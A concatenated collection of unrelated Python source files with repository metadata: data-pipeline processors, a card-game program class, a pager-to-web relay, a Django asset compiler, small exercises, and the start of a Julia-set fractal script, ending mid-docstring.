    spew(datapackage_, [[] for _ in datapackage_['resources']])
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/read_description.py",
"copies": "1",
"size": "2788",
"license": "mit",
"hash": -817485862679533700,
"line_mean": 29.3043478261,
"line_max": 79,
"alpha_frac": 0.6631994261,
"autogenerated": false,
"ratio": 3.988555078683834,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 92
} |
"""A processor to inject categories values into the data."""
from datapackage_pipelines.wrapper import ingest, spew
from common.row_processor import process
def inject_categories(row, **category_tables):
    """Translate raw category values in the row via lookup tables.

    For every ``category`` keyword, ``row[category]`` is replaced by its
    entry in the corresponding lookup ``table``.  (The previous docstring
    was copy-pasted from the constants injector and described behavior
    this processor does not have.)

    :param row: one row of data as `dict`
    :param category_tables: a `dict` of lookup tables
    :returns: a ``(row, report)`` tuple, where ``report`` is ``'_pass'`` on
        success or the last value that could not be looked up.
    """
    report = '_pass'
    for category, table in category_tables.items():
        try:
            row[category] = table[row[category]]
        except KeyError:
            # row.get avoids raising a second KeyError when the row itself
            # lacks the category key (the old code re-raised in that case).
            report = row.get(category)
    return row, report
if __name__ == '__main__':
    """Ingest, process and spew out."""
    # Row-process every resource through inject_categories, using the
    # pipeline parameters as the lookup tables.
    parameters_, datapackage_, resources_ = ingest()
    new_resources_, _ = process(resources_,
                                inject_categories,
                                datapackage=datapackage_,
                                parameters=parameters_)
    spew(datapackage_, new_resources_)
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/add_categories.py",
"copies": "1",
"size": "1290",
"license": "mit",
"hash": -2969534193247457300,
"line_mean": 29,
"line_max": 73,
"alpha_frac": 0.6224806202,
"autogenerated": false,
"ratio": 4.607142857142857,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5729623477342857,
"avg_score": null,
"num_lines": null
} |
"""A processor to inject constant values into the data."""
from datapackage_pipelines.wrapper import ingest, spew
from common.row_processor import process
def inject_constants(row, **constants):
    """Copy constant values into the data row.

    Constants are taken from the following places (in order of override):
    * The processor's pipeline parameters
    * The datapackage's `constant_fields_injector` property
    * Each resource's `constant_fields_injector` property
    If no constants are found, the processor does nothing.
    :param row: one row of data as `dict`
    :param constants: a `dict` of constants
    :returns row: the new row
    """
    for field, constant in constants.items():
        if constant is not None:
            row[field] = constant
    return row, '_pass'
if __name__ == '__main__':
    """Ingest, process and spew out."""
    # Row-process every resource, injecting pipeline parameters as
    # constant column values.
    parameters_, datapackage_, resources_ = ingest()
    new_resources_, _ = process(resources_,
                                inject_constants,
                                datapackage=datapackage_,
                                parameters=parameters_)
    spew(datapackage_, new_resources_)
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/add_constants.py",
"copies": "1",
"size": "1193",
"license": "mit",
"hash": -813487515100932700,
"line_mean": 27.4047619048,
"line_max": 73,
"alpha_frac": 0.6186085499,
"autogenerated": false,
"ratio": 4.5534351145038165,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5672043664403817,
"avg_score": null,
"num_lines": null
} |
"""A processor to map values."""
from logging import warning
from common.utilities import process
from datapackage_pipelines.wrapper import ingest, spew
def map_aliases(row, lookup_tables):
    """Replace alias values in ``row`` using the provided lookup tables.

    A value with no known alias is replaced by ``None`` and a warning is
    logged.
    """
    for field, table in lookup_tables.items():
        alias = row[field]
        if alias in table:
            row[field] = table[alias]
        else:
            warning('%s mapped to None because no alias was found', alias)
            row[field] = None
    return row
def build_lookup_tables(mappings):
    """Build one alias->canonical lookup table per mapped field.

    Each mapping entry has a ``field`` name and a ``mapping`` of canonical
    values to their lists of aliases; the result inverts that relation.
    """
    tables = {}
    for entry in mappings:
        table = {}
        for canonical, aliases in entry['mapping'].items():
            for alias in aliases:
                table[alias] = canonical
        tables[entry['field']] = table
    return tables
if __name__ == '__main__':
    # NOTE(review): `_` here holds the ingested datapackage and is re-used
    # in the spew() call below despite the throwaway-looking name.
    parameters, _, resources = ingest()
    lookup_tables_ = build_lookup_tables(parameters['mappings'])
    new_resources = process(resources, map_aliases,
                            lookup_tables=lookup_tables_)
    spew(_, new_resources)
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/map_values.py",
"copies": "1",
"size": "1135",
"license": "mit",
"hash": 4418022603545033700,
"line_mean": 27.375,
"line_max": 77,
"alpha_frac": 0.6070484581,
"autogenerated": false,
"ratio": 4.299242424242424,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5406290882342424,
"avg_score": null,
"num_lines": null
} |
"""A processor to stream data from files."""
import os
import json
import cchardet as chardet
from tabulator import Stream
from logging import warning, info
from datapackage_pipelines.wrapper import ingest, spew
from petl import look, fromdicts
from common.config import LOG_SAMPLE_SIZE
from common.utilities import format_to_json, sanitize_field_names
def get_json_headers(path):
    """Return every field name encountered across all rows of a JSON file."""
    with open(path) as handle:
        rows = json.load(handle)
    headers = set()
    for row in rows:
        headers.update(row)
    return list(headers)
def get_encoding(parameters, resource):
    """Return the configured encoding, falling back to a chardet guess.

    Resource-level settings override processor parameters, which in turn
    override the automatic detection.
    """
    with open(resource['path'], 'rb') as handle:
        detected = chardet.detect(handle.read())['encoding']
    return (resource.get('encoding')
            or parameters.get('encoding')
            or detected)
def get_skip_rows(row_to_skip):
    """Return a tabulator post-parse processor that drops the given rows.

    :param row_to_skip: a collection of 1-based row numbers to discard
    """
    def skip_rows(rows):
        for index, headers, row in rows:
            if index in row_to_skip:
                row_as_json = format_to_json(dict(zip(headers, row)))
                warning('Skipping row %s = %s', index, row_as_json)
            else:
                yield (index, headers, row)
    return skip_rows
def drop_bad_rows(rows):
    """Yield only rows whose cell count matches the header count."""
    for index, headers, row in rows:
        if len(row) != len(headers):
            warning('Bad row %s = %s', index, row)
            continue
        yield (index, headers, row)
def force_strings(rows):
    """Coerce every cell value of every row to ``str``."""
    for index, headers, values in rows:
        yield (index, headers, [str(value) for value in values])
def fill_missing_fields(path):
    """Rewrite a JSON file so every row carries every field (None if absent).

    Pre-filling incomplete rows prevents fields from mixing up downstream.
    """
    headers = get_json_headers(path)
    with open(path) as handle:
        rows = json.loads(handle.read())
    for row in rows:
        for header in headers:
            row.setdefault(header, None)
    with open(path, 'w+') as handle:
        handle.write(format_to_json(rows))
def log_sample_table(stream):
    """Record a tabular preview of the stream sample in the log."""
    keyed = [dict(zip(stream.headers, values)) for values in stream.sample]
    table = look(fromdicts(keyed), limit=len(stream.sample))
    info('Data sample =\n%s', table)
def check_fields_match(resource, stream):
    """Assert that the datapackage and the data share the same field set."""
    data_fields = [str(field) for field in stream.headers if field]
    sourced_fields = [field['name'] for field in resource['schema']['fields']]
    nb_untitled_fields = len(stream.headers) - len(data_fields)
    info('%s fields sourced = %s', len(sourced_fields),
         format_to_json(sorted(sourced_fields)))
    info('%s untitled fields in the data', nb_untitled_fields)
    info('%s fields in the data = %s', len(data_fields),
         format_to_json(sorted(data_fields)))
    message = 'Data and source fields do not match'
    assert set(data_fields) == set(sourced_fields), message
def get_headers(parameters, path):
    """Return the sanitized header row of the file at ``path``."""
    with Stream(path, **parameters) as stream:
        raw_headers = stream.headers
    return sanitize_field_names(raw_headers)
def stream_local_file(datapackage, **parameters):
    """Read local files and return row iterators.

    Yields one keyed row iterator per resource in the datapackage,
    configuring tabulator per file extension (.csv, .xls/.xlsx, .json).
    """
    if not parameters.get('sample_size'):
        parameters.update(sample_size=LOG_SAMPLE_SIZE)
    # NOTE(review): ``parameters`` is mutated in place on every iteration,
    # so per-resource options (e.g. encoding, parser_options) leak into
    # subsequent resources — confirm this is intended.
    for resource in datapackage['resources']:
        path = resource['path']
        _, extension = os.path.splitext(path)
        parameters.update(headers=1)
        # Reset post-parse processors for each resource.
        parameters['post_parse'] = []
        if 'parser_options' in resource:
            # skip_rows is popped out and handled via a post-parse
            # processor; the rest is passed straight to tabulator.
            if resource['parser_options'].get('skip_rows'):
                row_numbers = resource['parser_options'].pop('skip_rows') or []
                if row_numbers:
                    parameters['post_parse'] = [get_skip_rows(row_numbers)]
            parameters.update(**resource.get('parser_options'))
        if extension == '.csv':
            parameters['post_parse'].append(drop_bad_rows)
            parameters.update(encoding=get_encoding(parameters, resource))
        if extension in ('.xls', '.xlsx'):
            # Excel cells come back typed; downstream expects strings.
            parameters['post_parse'].append(force_strings)
        if extension == '.json':
            # Rewrites the file on disk so every row has every field.
            fill_missing_fields(path)
            parameters['post_parse'].append(force_strings)
        info('Ingesting file = %s', path)
        info('Ingestion parameters = %s', format_to_json(parameters))
        parameters.update(headers=get_headers(parameters, path))
        with Stream(path, **parameters) as stream:
            check_fields_match(resource, stream)
            log_sample_table(stream)
            yield stream.iter(keyed=True)
if __name__ == '__main__':
    # Pipeline entry point: parameters may come back as None when the step
    # declares none, so normalize to an empty dict before streaming.
    parameters_, datapackage_, _ = ingest()
    parameters_ = {} if parameters_ is None else parameters_
    resources = stream_local_file(datapackage_, **parameters_)
    spew(datapackage_, resources)
| {
"repo_name": "Victordeleon/os-data-importers",
"path": "eu-structural-funds/common/processors/stream_from_path.py",
"copies": "1",
"size": "5351",
"license": "mit",
"hash": 8960390727331111000,
"line_mean": 30.6627218935,
"line_max": 79,
"alpha_frac": 0.6314707531,
"autogenerated": false,
"ratio": 3.9029905178701676,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 169
} |
"""A program card."""
from csrv.model import actions
from csrv.model import events
from csrv.model.cards import card_base
from csrv.model import game_object
from csrv.model import modifiers
from csrv.model import parameters
from csrv.model import timing_phases
from csrv.model.cards import card_info
class Program(card_base.CardBase):
  """Base card type for runner programs.

  Programs live in the runner's rig, cannot be rezzed, and expose an
  install action while in hand during the runner's action phase."""
  TYPE = card_info.PROGRAM
  REZZABLE = False
  # Events this card listens for while installed.
  WHEN_INSTALLED_LISTENS = [
      events.PurgeVirusCounters,
  ]
  # Phase -> method name providing choices while the card is in hand.
  WHEN_IN_HAND_PROVIDES_CHOICES_FOR = {
      timing_phases.RunnerTurnActions: 'install_actions',
  }
  HOST_ON = []
  @property
  @modifiers.modifiable(modifiers.ProgramStrengthModifier, server_scope=False)
  def strength(self):
    """The program's strength, subject to strength modifiers."""
    return self.STRENGTH
  @property
  @modifiers.modifiable(modifiers.ProgramCostModifier, server_scope=False)
  def cost(self):
    """The program's install cost, subject to cost modifiers."""
    return self.COST
  def build_actions(self):
    # Single reusable install action, offered via install_actions().
    self.install_action = actions.InstallProgram(self.game, self.player, self)
  def install_actions(self):
    """Choices offered while this card is in hand."""
    return [self.install_action]
  def install_host_targets(self):
    """Return rig cards that can host this program."""
    targets = []
    for card in self.game.runner.rig.cards:
      if card.can_host(self):
        targets.append(card)
    return targets
  def install_programs_to_trash_targets(self):
    """Return installed programs that could be trashed to make room."""
    return [c for c in self.game.runner.rig.cards if isinstance(c, Program)]
  def on_purge_virus_counters(self, sender, event):
    # Purging resets this program's virus counters to zero.
    self.virus_counters = 0
  def on_install(self):
    card_base.CardBase.on_install(self)
    self.trigger_event(events.InstallProgram(self.game, self.player))
    # Installed programs become valid trash targets for future installs.
    self.game.register_response_target(
        parameters.InstallProgramRequest, 'programs_to_trash', self)
  def on_uninstall(self):
    card_base.CardBase.on_uninstall(self)
    self.game.deregister_response_target(
        parameters.InstallProgramRequest, 'programs_to_trash', self)
| {
"repo_name": "mrroach/CentralServer",
"path": "csrv/model/cards/program.py",
"copies": "1",
"size": "1810",
"license": "apache-2.0",
"hash": 7477273404108826000,
"line_mean": 26.8461538462,
"line_max": 78,
"alpha_frac": 0.7287292818,
"autogenerated": false,
"ratio": 3.5009671179883948,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4729696399788395,
"avg_score": null,
"num_lines": null
} |
# A program made by Shane (Shaggs) Rees to use PDW's email function into python.
""" To get Started
Options -> SMTP / email settings
Setting set to all messages
SMTP Host 127.0.0.1
Port 8826
To can be set as anything
From can be set as anything
Mail options select
Address, Time, Date, Bitrate, Message
Notification set to messages
"""
import asyncore
from datetime import datetime
import email
from clint.textui import puts, colored
import time
import smtpd
import requests
frag = " "
def apost(flexcode, msg, when):
    """Forward a single decoded page to the PagerMon HTTP API."""
    payload = {
        "address": flexcode,
        "message": msg,
        "datetime": when,
        "source": "",
    }
    api_headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'apikey': "",  # pagermon APIKey
        'User-Agent': 'PagerMon pdw2pagermon.py',
    }
    requests.post('http://Your IP Address Here/api/messages',
                  data=payload, headers=api_headers)
class CustomSMTPServer(smtpd.SMTPServer):
    """SMTP sink that parses PDW mail notifications and relays them to
    PagerMon."""

    # Bug fix: self.frag was previously only assigned in the bitrate-1600
    # branch, so a continuation (1601) arriving first raised AttributeError.
    # This class-level default makes that safe.  (The module-level ``frag``
    # global was never read and remains dead code.)
    frag = " "

    def _display(self, flexcode, when, msg):
        """Pretty-print one decoded message to the console."""
        puts(colored.yellow(flexcode), newline=False)
        puts(" [", newline=False)
        puts(colored.green(when), newline=False)
        puts("] ", newline=False)
        puts(msg)

    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
        """Parse a PDW email notification and forward it to PagerMon.

        The mail body is expected to contain: address, time, date, bitrate
        and message, separated by spaces (matching PDW's mail options).
        Bitrate 1600 is an initial message; 1601 is a continuation that is
        prepended with the previously stored fragment.
        """
        mime_message = email.message_from_bytes(data)
        message = mime_message.get_payload()
        flexcode, a, b, bitrate, msg = message.split(' ', 4)
        when = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
        flexcode = "00" + flexcode
        msg = msg.strip()
        bitrate = str(bitrate)
        if bitrate == "1600":
            # Remember the message in case a continuation follows.
            self.frag = msg
            self._display(flexcode, when, msg)
            apost(flexcode, msg, when)
        elif bitrate == "1601":
            # Continuation frame: glue it onto the stored fragment.
            msg = self.frag + msg
            self._display(flexcode, when, msg)
            apost(flexcode, msg, when)
        return
# Bind the SMTP sink on localhost:8826 (must match PDW's SMTP host/port
# settings) and run the asyncore event loop forever.
server = CustomSMTPServer(('127.0.0.1', 8826), None)
asyncore.loop()
| {
"repo_name": "davidmckenzie/pagermon",
"path": "client/pdw2pagermon.py",
"copies": "1",
"size": "1798",
"license": "unlicense",
"hash": -7543912581026589000,
"line_mean": 26.2424242424,
"line_max": 89,
"alpha_frac": 0.680756396,
"autogenerated": false,
"ratio": 2.966996699669967,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8978296764213853,
"avg_score": 0.03389126629122267,
"num_lines": 66
} |
"""A programmatic compiler of static assets."""
from __future__ import unicode_literals
import abc
from django.utils import six
from optimizations.assetcache import StaticAsset
class AssetCompilerPluginRegistrationError(Exception):
    """An error occurred while registering asset compiler plugins."""
class AssetCompilerPluginBase(six.with_metaclass(abc.ABCMeta)):
    """Base class for asset compiler plugins.

    Subclasses must implement compile_assets()."""
    # Human-readable label for the kind of asset this plugin handles.
    asset_type = "various"
    @abc.abstractmethod
    def compile_assets(self, assets):
        """Compiles the given assets."""
        raise NotImplementedError
class AssetCompiler(object):
    """A programmatic compiler of static assets."""
    def __init__(self):
        """Initializes the asset compiler."""
        # Plugin name -> AssetCompilerPluginBase instance.
        self._plugins = {}
    # Registration.
    def register_plugin(self, name, plugin):
        """Registers the given plugin with the asset compiler.

        Raises AssetCompilerPluginRegistrationError if the name is taken or
        the plugin is not an AssetCompilerPluginBase instance.
        """
        if name in self._plugins:
            raise AssetCompilerPluginRegistrationError("{name} is already registered with this asset compiler.".format(name=name))
        if not isinstance(plugin, AssetCompilerPluginBase):
            raise AssetCompilerPluginRegistrationError("{plugin} is not an instance of AssetCompilerPluginBase.".format(plugin=plugin))
        self._plugins[name] = plugin
    def unregister_plugin(self, name):
        """Unregisters the given plugin."""
        try:
            del self._plugins[name]
        except KeyError:
            # Bug fix: the old message claimed the plugin was "already
            # registered"; the actual failure is that it is NOT registered.
            raise AssetCompilerPluginRegistrationError("{name} is not registered with this asset compiler.".format(name=name))
    def has_plugin(self, name):
        """Tests whether the given plugin is registered with this asset compiler."""
        return name in self._plugins
    # Compilation.
    def compile_iter(self, namespace="default"):
        """Iterates over all assets in the given namespace, compiling as it goes."""
        for plugin_name, plugin in six.iteritems(self._plugins):
            assets = StaticAsset.load(plugin_name, namespace)
            plugin.compile_assets(assets)
            yield plugin, assets
    def compile(self, namespace="default"):
        """Compiles all assets in the given namespace."""
        return list(self.compile_iter(namespace))
# A shared, global asset compiler.
default_asset_compiler = AssetCompiler() | {
"repo_name": "etianen/django-optimizations",
"path": "src/optimizations/assetcompiler.py",
"copies": "1",
"size": "2397",
"license": "bsd-3-clause",
"hash": -2061890371834176500,
"line_mean": 32.3055555556,
"line_max": 135,
"alpha_frac": 0.6637463496,
"autogenerated": false,
"ratio": 4.891836734693878,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6055583084293877,
"avg_score": null,
"num_lines": null
} |
# A program that computes the the area in feet of three (3) rooms
# their must be four function to compute the area
# Written by Adrian Anderson Programmer, 11/27/17
store = []
def feet_to_yards(yard):
    """Convert a length in feet to yards (3 feet = 1 yard).

    NOTE(review): the parameter actually receives a length in *feet*
    despite its name; the name is kept for call compatibility.
    """
    # `yard * 1/3` evaluates left-to-right as (yard * 1) / 3, i.e. yard / 3.
    return yard / 3
def area_of_room(length, width, height):
    """Return the total wall area: both pairs of facing walls."""
    perimeter_pair = length + width
    return 2 * height * perimeter_pair
def cost_per_feet(num_of_feet):
    """Return the carpet cost at a rate of $8.95 per unit."""
    rate = 8.95
    return rate * num_of_feet
def main():
    """Prompt for three rooms' dimensions and print the combined carpet cost."""
    room = 0
    for i in range(3):
        room += 1
        length = int(input('What is the length of the room ' + str(room) + ' ' ))
        print('')
        width = int(input('What is the width of the room ' + str(room) + ' '))
        print('')
        height = int(input('What is the height of the room ' + str(room) + ' '))
        print('')
        # NOTE(review): area_of_room's signature is (length, width, height)
        # but it is called with (height, width, length) — the first and
        # third arguments are swapped; confirm the intended formula.
        area = area_of_room(height, width, length)
        yard = feet_to_yards(area)
        # NOTE(review): cost_per_feet is applied to a value in *yards* —
        # confirm whether $8.95 is a per-foot or per-yard rate.
        cost = cost_per_feet(yard)
        # Costs accumulate in the module-level `store` list across calls.
        store.append(cost)
    total_cost = sum(store)
    print('The total cost of the three room combine is', f'{total_cost:.2f}')
main()
| {
"repo_name": "biggapoww/Python-CIS-5",
"path": "computing_carpet.py",
"copies": "1",
"size": "1032",
"license": "mit",
"hash": -8258527748024722000,
"line_mean": 24.1707317073,
"line_max": 81,
"alpha_frac": 0.5843023256,
"autogenerated": false,
"ratio": 3.2555205047318614,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9171250698811089,
"avg_score": 0.03371442630415464,
"num_lines": 41
} |
# A program that has a list of six colors and chooses one by random. The user can then has three chances to quess the right color. After the third attepmt the program outputs "Nope. The color I was thinking of was..."
import random
# this is the function that will execute the program
def program():
    """Play one round of the color-guessing game on stdin/stdout.

    Picks one of six colors at random and gives the player three
    attempts to guess it.
    """
    options = ['blue', 'green', 'red', 'orange', 'purple', 'pink']
    # Greet the player and learn their name for the later messages.
    name = input('Hello! What is your name?\n')
    secret = random.choice(options)
    print ('Well, {0}, I am thinking of a color between blue, green, red, orange, purple and pink.'.format(name))
    attempts = 0
    guess = None
    while attempts < 3:
        guess = input('Take a guess: ')
        attempts += 1
        if guess != secret:
            print ('Your guess is wrong.')
        if guess == secret:
            break
    if guess == secret:
        print ('Good job, {0}! You guessed my color in {1} guesses!'.format(name, attempts))
    else:
        print ('Nope. The color I was thinking of was {0}'.format(secret))


if __name__ == "__main__":
    program()
| {
"repo_name": "starnes/Python",
"path": "guessnameclass.py",
"copies": "1",
"size": "1452",
"license": "mit",
"hash": 844623943014182800,
"line_mean": 29.25,
"line_max": 217,
"alpha_frac": 0.6095041322,
"autogenerated": false,
"ratio": 3.4004683840749412,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4509972516274941,
"avg_score": null,
"num_lines": null
} |
"""A program that implements classifying data by primitive algorythms."""
from classifier import Classifier
from onerule import OneRuleClassifier
# The constant that defines the count of
# data to be passed while training classifier
MAX_SELECTOR = 2
def main():
    """Load the iris data set, train both classifiers on every
    (MAX_SELECTOR + 1)-th row, and print how each one classifies the
    full data set."""
    data = read_from_file(name='iris.data')
    training_data = []
    selector = 0
    for item in data:
        # Keep one item out of every MAX_SELECTOR + 1 for training.
        if selector >= MAX_SELECTOR:
            training_data.append(item)
            selector = 0
        else:
            selector += 1
    print("Plain classifier: ")
    classifier = Classifier(training_data)
    classifier.classify(data)
    # NOTE(review): a bare `print` emits a blank line under Python 2 but is
    # a no-op expression under Python 3 -- confirm the target interpreter;
    # if a blank line is wanted on Python 3 this should be print().
    print
    print("1R classifier: ")
    classifier = OneRuleClassifier(training_data)
    classifier.classify(data)
def read_from_file(name="", expected_features=4):
    """Parse a CSV data file into a list of data points.

    Each row is expected to hold ``expected_features`` numeric values
    followed by a class label; rows that do not match are skipped.

    name: path of the CSV file to read.
    expected_features: number of numeric attributes per row.  Defaults
        to 4, matching the iris data set, so existing callers are
        unaffected; other data sets can now be read as well.
    returns: list of dicts of the form {"vals": [float, ...], "class": str}.
    """
    data = []
    import csv
    with open(name, "r") as data_file:
        datareader = csv.reader(data_file, delimiter=',', quotechar=' ')
        for row in datareader:
            point = {"vals": []}
            for value in row:
                # Numeric cells become features; the non-numeric cell is
                # treated as the class label.
                try:
                    point["vals"].append(float(value))
                except ValueError:
                    point["class"] = value
            if len(point["vals"]) == expected_features and "class" in point:
                data.append(point)
    return data
if __name__ == "__main__":
    main()
| {
"repo_name": "cleac/univ-datamine",
"path": "lab1/main.py",
"copies": "1",
"size": "1367",
"license": "mit",
"hash": -1097262508513632100,
"line_mean": 26.34,
"line_max": 73,
"alpha_frac": 0.5786393563,
"autogenerated": false,
"ratio": 4.219135802469136,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5297775158769136,
"avg_score": null,
"num_lines": null
} |
"""A program that implements classifying data by primitive algorythms."""
from classifier import Classifier
# The constant that defines the count of
# data to be passed while training classifier
MAX_SELECTOR = 2


def main():
    """Train the classifier on every (MAX_SELECTOR + 1)-th row of the
    iris data, then classify the whole data set."""
    data = read_from_file(name='iris.data')
    # Select indices MAX_SELECTOR, 2*MAX_SELECTOR + 1, ... -- i.e. one
    # row out of every MAX_SELECTOR + 1, exactly as the original
    # stateful selector counter did.
    training_data = [
        item
        for position, item in enumerate(data)
        if position % (MAX_SELECTOR + 1) == MAX_SELECTOR
    ]
    print("Divide'n'Conquer classifier: ")
    classifier = Classifier(training_data)
    classifier.classify(data)
def read_from_file(name="", expected_features=4):
    """Parse a CSV data file into a list of data points.

    Each row is expected to hold ``expected_features`` numeric values
    followed by a class label; rows that do not match are skipped.

    name: path of the CSV file to read.
    expected_features: number of numeric attributes per row.  Defaults
        to 4, matching the iris data set, so existing callers are
        unaffected; other data sets can now be read as well.
    returns: list of dicts of the form {"vals": [float, ...], "class": str}.
    """
    data = []
    import csv
    with open(name, "r") as data_file:
        datareader = csv.reader(data_file, delimiter=',', quotechar=' ')
        for row in datareader:
            point = {"vals": []}
            for value in row:
                # Numeric cells become features; the non-numeric cell is
                # treated as the class label.
                try:
                    point["vals"].append(float(value))
                except ValueError:
                    point["class"] = value
            if len(point["vals"]) == expected_features and "class" in point:
                data.append(point)
    return data
if __name__ == "__main__":
    main()
| {
"repo_name": "cleac/univ-datamine",
"path": "lab2/main.py",
"copies": "1",
"size": "1221",
"license": "mit",
"hash": -5373161933638116000,
"line_mean": 26.1333333333,
"line_max": 73,
"alpha_frac": 0.5593775594,
"autogenerated": false,
"ratio": 4.181506849315069,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5240884408715069,
"avg_score": null,
"num_lines": null
} |
""" A program that stores and updates a counter using a Python pickle file"""
from os.path import exists
import sys
from pickle import dump, load
def update_counter(file_name, reset=False):
    """ Updates a counter stored in the file 'file_name'
    A new counter will be created and initialized to 1 if none exists or if
    the reset flag is True.
    If the counter already exists and reset is False, the counter's value will
    be incremented.
    file_name: the file that stores the counter to be incremented. If the file
    doesn't exist, a counter is created and initialized to 1.
    reset: True if the counter in the file should be reset.
    returns: the new counter value
    >>> update_counter('blah.txt',True)
    1
    >>> update_counter('blah.txt')
    2
    >>> update_counter('blah2.txt',True)
    1
    >>> update_counter('blah.txt')
    3
    >>> update_counter('blah2.txt')
    2
    """
    # (Python 2: pickles to text-mode files; Python 3 would require the
    # binary modes 'rb+'/'wb' here.)
    if exists(file_name):
        # 'r+' opens for read/write WITHOUT truncating; dump() below
        # overwrites from the current position (start of file).
        f = open(file_name, 'r+')
        if reset:
            counter = 1
            dump(counter, f)
        else:
            counter = load(f)  # load() consumes exactly one pickled object
            counter += 1
            f.seek(0,0)  # rewind so the new value overwrites the old one
            dump(counter, f)
        # NOTE(review): the file is never truncated, so if a shorter pickle
        # ever replaced a longer one, stale trailing bytes would remain
        # (harmless for load(), which stops after the first object).
    else:
        # No counter yet: create the file and start at 1.
        f = open(file_name, 'w')
        counter = 1
        dump(counter, f)
    f.close()
    return counter
if __name__ == '__main__':
    # With no file argument, run the docstring examples as doctests;
    # otherwise bump the counter stored in the named file.
    if len(sys.argv) < 2:
        import doctest
        doctest.testmod()
    else:
        # (Python 2 print statement.)
        print "new value is " + str(update_counter(sys.argv[1]))
"repo_name": "nshlapo/SoftwareDesignFall15",
"path": "toolbox/pickling/counter.py",
"copies": "1",
"size": "1300",
"license": "mit",
"hash": 8534215024426564000,
"line_mean": 21.0508474576,
"line_max": 77,
"alpha_frac": 0.6684615385,
"autogenerated": false,
"ratio": 3.0878859857482186,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8935356029647594,
"avg_score": 0.0641982989201247,
"num_lines": 59
} |
#A program that takes two given numbers and returns their LCM
# -Shriram Krishnamachari 7/19/16
from collections import Counter as mset
def smallestFactor(n):
    """Return the smallest factor of n that is >= 2.

    For n < 2 the search range is empty and None is returned implicitly.
    """
    candidate = 2
    while candidate <= n:
        if n % candidate == 0:
            return candidate
        candidate += 1
def factorize(number):
    """Return the prime factorization of number as a list with
    multiplicity, e.g. factorize(12) -> [2, 2, 3].

    factorize(1) returns [1] as a special case; for number < 1 the loop
    never runs and an empty list (or [1]-less list) is returned, matching
    the original behaviour.

    Fix: the original divided with `/`, which floor-divides ints only
    under Python 2; `//` is behaviourally identical there and keeps the
    values integral on Python 3 as well.  The smallest-factor search is
    inlined so the function is self-contained.
    """
    factors = list()
    if number == 1:
        factors.append(1)
    remaining = number
    while remaining > 1:
        # Trial division: find the smallest divisor >= 2 (always prime).
        divisor = 2
        while remaining % divisor != 0:
            divisor += 1
        factors.append(divisor)
        remaining //= divisor
    return factors
def gcd(number1, number2):
    """Return the greatest common divisor of number1 and number2.

    Replaces the prime-factor multiset intersection with Euclid's
    algorithm: identical results for positive integers, vastly faster
    for large primes (the factorization approach is exponential in the
    size of a prime input), and fixes gcd(0, n), which the factorization
    approach reported as 1 instead of n.
    """
    a, b = number1, number2
    while b:
        a, b = b, a % b
    return a
def lcm(number1, number2):
    """Return the least common multiple of number1 and number2.

    The product is always an exact multiple of the gcd, so floor
    division is exact; `//` keeps the result an int under Python 3 as
    well as Python 2 (where the original `/` already floor-divided).
    """
    return number1 * number2 // gcd(number1, number2)
number1 = input('Give a number')
number2 = input('Give another number')
print 'The Least common multiple is ' + str(lcm(number1, number2)) | {
"repo_name": "TheArcMagician/Number-theory",
"path": "leastcommonmultiple.py",
"copies": "1",
"size": "1119",
"license": "mit",
"hash": -312735640968435000,
"line_mean": 20.1320754717,
"line_max": 69,
"alpha_frac": 0.5987488829,
"autogenerated": false,
"ratio": 3.4643962848297214,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.45631451677297213,
"avg_score": null,
"num_lines": null
} |
# a program to calculate fractals
import itertools
import numpy
import pyglet
import pyglet.graphics
import julia
class Point(object):
    """A mutable 2-D point used to track mouse click/drag positions.

    clear() marks the point as unset by storing None in both
    coordinates; valid() reports whether both are set.
    """

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __str__(self):
        # Note: %d requires numeric coordinates; a cleared point would raise.
        return "(%d, %d)" % (self.x, self.y)

    def clear(self):
        """Mark the point as unset."""
        self.x = None
        self.y = None

    def valid(self):
        """Return True when both coordinates are set.

        Bug fix: the original truthiness test (`if self.x and self.y`)
        treated a legitimate screen coordinate of 0 as "unset", so
        clicks on the left or bottom edge of the window were ignored.
        Compare against None explicitly instead.
        """
        return self.x is not None and self.y is not None
class World(object):
    """Holds the computed Julia-set point data together with the
    viewport it was computed for."""

    def __init__(self, julia_set, others, colors):
        # julia_set / other_points: flat [x0, y0, x1, y1, ...] lists of
        # screen coordinates; colors: four RGBA bytes per other_point.
        self.julia_set = julia_set
        self.other_points = others
        self.colors = colors

    def set_attributes(self, x_origin, y_origin, width, size):
        """Record the complex-plane viewport (origin and width) and the
        screen size in pixels that the current data corresponds to."""
        self.x_origin, self.y_origin = x_origin, y_origin
        self.width, self.size = width, size
def number_in_julia_set(z, c, max_iterations=100):
    """Iterate z -> z**2 + c and test for escape.

    Returns True when |z_n| stays <= 2 for max_iterations iterations
    (the point is treated as inside the Julia set for parameter c);
    otherwise returns the 0-based iteration index at which |z_n| first
    exceeded 2, which callers use to colour the point.

    Changes: `xrange` (Python 2 only) replaced by the behaviourally
    identical `range`, and the hard-coded iteration cap of 100 exposed
